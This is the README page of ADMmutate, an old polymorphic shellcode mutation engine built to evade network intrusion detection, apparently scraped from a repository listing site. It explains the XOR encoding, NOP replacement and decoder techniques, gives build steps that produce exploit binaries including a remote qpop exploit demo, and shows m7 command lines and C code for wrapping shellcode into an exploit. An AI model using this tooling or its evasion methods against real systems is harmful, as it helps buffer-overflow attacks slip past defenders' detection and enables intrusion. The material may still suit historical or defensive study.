ADMMutate
Classic code from 1999+ I am fairly sure this is the first public polymorphic shellcode ever (best IMHO and others http://ids.cs.columbia.edu/sites/default/files/ccs07poly.pdf :) If I ever port this to 64 or implement a few other suggestions (sorry I lost ppc code version contributed) it will be orders of magnitude more difficult to spot, so I hope nobody uses signatures for anything (virus / malware scanners included).
Install / Use
/learn @K2/ADMMutateREADME
ADMmutate
___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
..oO THE | --- | | / | | | | CreW Oo..
''' ''' ''''''' '''' ''''
presents
[ ADMmutate 0.8.4 by K2 ]
A shellcode mutation engine that can evade NIDS.
Table of Contents
- Overview
- Features
- How It Works
- Installation
- Quick Start
- Documentation
- Architecture Support
- Compatibility
- Security
- Contributing
- License
- Acknowledgments
Overview
ADMmutate is a polymorphic shellcode mutation engine designed to evade Network Intrusion Detection Systems (NIDS). It uses techniques pioneered by virus writers to create functionally equivalent but unique code fragments that resist signature-based detection.
What is Polymorphism?
Polymorphism is the ability to exist in multiple forms. ADMmutate applies mutation algorithms to application-level data, creating equivalently functional but completely unique code fragments on each execution.
Features
- Polymorphic Encoding: XOR-based encoding with 2×16-bit keys for maximum keyspace
- Sliding Keys: IA32 sliding keys defeat shellcode recovery attempts (64-bit key+slide combinations)
- NOP Replacement: Up to 55 single-byte NOP alternatives on IA32 (about 1/5 of byte address space)
- Multiple Code Paths: Out-of-order decoder generation with multiple instruction alternatives
- Character Filtering: Support for
toupper(),tolower(), and custom banned character sets - Offset Modulation: Return address randomization for increased variance
- Multi-Architecture Support: IA32, SPARC, HPPA, MIPS architectures
- Weighted Junk Instructions: Statistical pattern matching with configurable weights
- High-Resolution Seeding: CPU tick/counter register seeding for rapid random generation
How It Works
The Problem: NIDS Detection
graph LR
A[Network Traffic] --> B{NIDS Detection}
B -->|Signature Analysis| C[Pattern Matching]
B -->|Protocol Analysis| D[Protocol Violations]
B -->|Traffic Statistics| E[Anomaly Detection]
C -->|Match Found| F[⚠️ ALERT]
D -->|Violation| F
E -->|Anomaly| F
style A fill:#1a1a2e,stroke:#16213e,color:#fff
style B fill:#e94560,stroke:#c72c48,color:#fff
style C fill:#e94560,stroke:#c72c48,color:#fff
style D fill:#e94560,stroke:#c72c48,color:#fff
style E fill:#e94560,stroke:#c72c48,color:#fff
style F fill:#ff5722,stroke:#d84315,color:#fff
Network Intrusion Detection Systems typically employ several techniques:
- Signature Analysis: Pattern matching against known attack signatures
- Protocol Analysis: Detecting protocol violations
- Traffic Pattern Statistics: Identifying anomalous traffic patterns
ADMmutate specifically targets signature analysis vulnerabilities.
The Solution: Polymorphic Shellcode
%%{init: {'theme':'dark'}}%%
flowchart TD
A[Traditional Exploit] --> B[NOP Sled<br/>700 bytes 0x90]
B --> C[Static Shellcode<br/>80 bytes]
C --> D[Return Address<br/>200 bytes]
E[ADMmutate Transform] --> F[Polymorphic Junk NOPs<br/>55 different opcodes]
F --> G[Dynamic Decoder<br/>Multiple code paths]
G --> H[Encoded Shellcode<br/>XOR with random keys]
H --> I[Modulated Return<br/>Randomized offset]
A -.->|Detected by<br/>NIDS| J[🚨 Signature Match]
E -.->|Evades| K[✅ Unique Each Time]
style A fill:#5c2626,stroke:#8b3a3a,color:#fff
style B fill:#6b2c2c,stroke:#8b3a3a,color:#fff
style C fill:#6b2c2c,stroke:#8b3a3a,color:#fff
style D fill:#6b2c2c,stroke:#8b3a3a,color:#fff
style E fill:#1a472a,stroke:#2d5f3f,color:#fff
style F fill:#235a35,stroke:#2d7a45,color:#fff
style G fill:#2d6e40,stroke:#3a8f52,color:#fff
style H fill:#2d6e40,stroke:#3a8f52,color:#fff
style I fill:#2d6e40,stroke:#3a8f52,color:#fff
style J fill:#d32f2f,stroke:#b71c1c,color:#fff
style K fill:#388e3c,stroke:#2e7d32,color:#fff
Traditional buffer overflow exploits follow a pattern:
[NOP Sled (700 bytes)] + [Shellcode (80 bytes)] + [Return Address (200 bytes)]
ADMmutate transforms this into:
[Junk NOPs] + [Decoder] + [Encoded Shellcode] + [Modulated Return]
Key Techniques
%%{init: {'theme':'base', 'themeVariables': { 'primaryColor':'#1a1a2e','primaryTextColor':'#fff','primaryBorderColor':'#0f3460','lineColor':'#16a085','secondaryColor':'#16213e','tertiaryColor':'#1a1a2e'}}}%%
mindmap
root((ADMmutate<br/>Techniques))
Shellcode Encoding
XOR with 2x16-bit keys
32-bit keyspace
Sliding keys IA32
64-bit key+slide combo
NOP Replacement
55 alternatives on IA32
Length-preserving
Weighted selection
Statistical matching
Dynamic Decoder
Multiple code paths
Out-of-order generation
Non-op padding
Random instructions
Advanced Obfuscation
Junk operations
Spare register use
Dynamic instructions
Modulated offsets
1. Shellcode Encoding: XOR encoding with random keys ensures unique signatures
2. NOP Replacement: Substitutes 0x90 NOPs with equivalent instructions (preserving length)
3. Dynamic Decoder Generation:
- Multiple code paths for each instruction
- Non-operational padding instructions
- Out-of-order instruction generation
- Randomly generated junk operations
4. Advanced Obfuscation:
- Weighted instruction selection for statistical matching
- Dynamic instructions (e.g.,
ADD N, %EAX) - Spare register utilization for junk operations
Installation
Prerequisites
- GCC compiler
- GNU Make
- Supported operating system (see Compatibility)
Build Instructions
- Clone the repository:
git clone https://github.com/K2/ADMMutate.git
cd ADMMutate
- Configure for your platform (edit
Makefile):
# Uncomment your OS
OS=-DLINUX
# OS=-DHPUX
# OS=-DBSD
# OS=-DOS5
# OS=-DTRU64
# Configure architecture-specific random seed
CFLAGS=-O -DDSRAND -DIA32_RND
# CFLAGS=-O -DDSRAND -DSPARCV9_RND
# CFLAGS=-O -DDSRAND -DHPPA_RND
- Build the project:
make clean
make
This will create:
m7- Mutation filter demoexp- Basic exploit exampleexpx- API demonstration exploitqp- Remote qpop Linux exploit demovulnerable- Local vulnerable test programvulnerable-remote- Remote vulnerable test program
Quick Start
Basic Usage with m7
The m7 tool is a demonstration mutation filter:
# Generate polymorphic shellcode from stdin
./exp | ./m7 -i -o 0xbffff63e -n 0x90
# Read from binary file
./m7 -i -o 0xbffff67e -n 0x90 -x ./exp
# With toupper() resilience
./m7 -U -i -o 0xbffff67e -n 0x90 -x ./exp
# With tolower() resilience
./m7 -l -i -o 0xbffff67e -n 0x90 -x ./exp
# Output as C array
./m7 -c -i -o 0xbffff67e -n 0x90 -x ./exp
# With offset modulation
./m7 -u -i -o 0xbffff67e -n 0x90 -x ./exp
# With buffer truncation
./m7 -t 100 -i -o 0xbffff67e -n 0x90 -x ./exp
Testing
Test the mutation engine with the vulnerable programs:
# Local exploitation test
./vulnerable `./exp | ./m7 -i -o 0xbffff63e -n 0x90`
# Direct execution test
./m7 -i -o 0xbffff67e -n 0x90 -x ./exp
API Usage
%%{init: {'theme':'dark', 'themeVariables': { 'fontSize':'16px'}}}%%
sequenceDiagram
autonumber
participant E as Exploit Code
participant M as Mutation Engine
participant B as Buffer
rect rgb(26, 26, 46)
note right of E: Initialization Phase
E->>M: init_mutate(&mut)
M-->>E: Engine Ready
end
rect rgb(42, 54, 59)
note right of E: Encoding Phase
E->>M: apply_key(buffer, shellcode_len, nops-1, &mut)
M->>M: Find valid XOR key
M->>B: Write encoded shellcode
M-->>E: Success
end
rect rgb(42, 59, 54)
note right of E: NOP Replacement
E->>M: apply_jnops(buffer, nops-1, mut)
M->>B: Replace NOPs with junk
M-->>E: Success
end
rect rgb(54, 42, 59)
note right of E: Decoder Injection
E->>M: apply_engine(buffer, shellcode_len, nops-1, mut)
M->>M: Generate polymorphic decoder
M->>B: Insert decoder before shellcode
M-->>E: Success
end
rect rgb(59, 54, 42)
note right of E: Optional Modulation
E->>M: apply_offset_mod(buffer, size, offset, mut)
M->>B: Modulate return address
M-->>E: Success
end
rect rgb(35, 142, 60)
note right of B: Result
B-->>E: ✅ Polymorphic Shellcode Ready
end
To integrate ADMmutate into your exploit:
#include "ADMmutapi.h"
int main() {
char buffer[BUFSIZ];
struct morphctl mut;
// Initialize mutation control structure
mut.upper = 0; // toupper() resilience
mut.lower = 0; // tolower() resilience
mut.banned = NULL; // banned characters
mut.arch = IA32; // target architecture
// Initialize mutation engine
init_mutate(&mut);
// Apply encoding to shellcode
apply_key(buffer, strlen(shellcode), nops-1, &mut);
// Replace NOPs with junk instructions
apply_jnops(buffer, nops-1, mut);
// Generate and insert decoder
apply_engine(buffer, strlen(shellcode), nops-1, mut);
// Optional: modulate return address
apply_offset_mod(buffer, ret_size, ret_offset, mut);
return 0;
}
Documentation
Comprehensive docu
Related Skills
node-connect
338.0kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
83.4kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
338.0kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
83.4kCommit, push, and open a PR
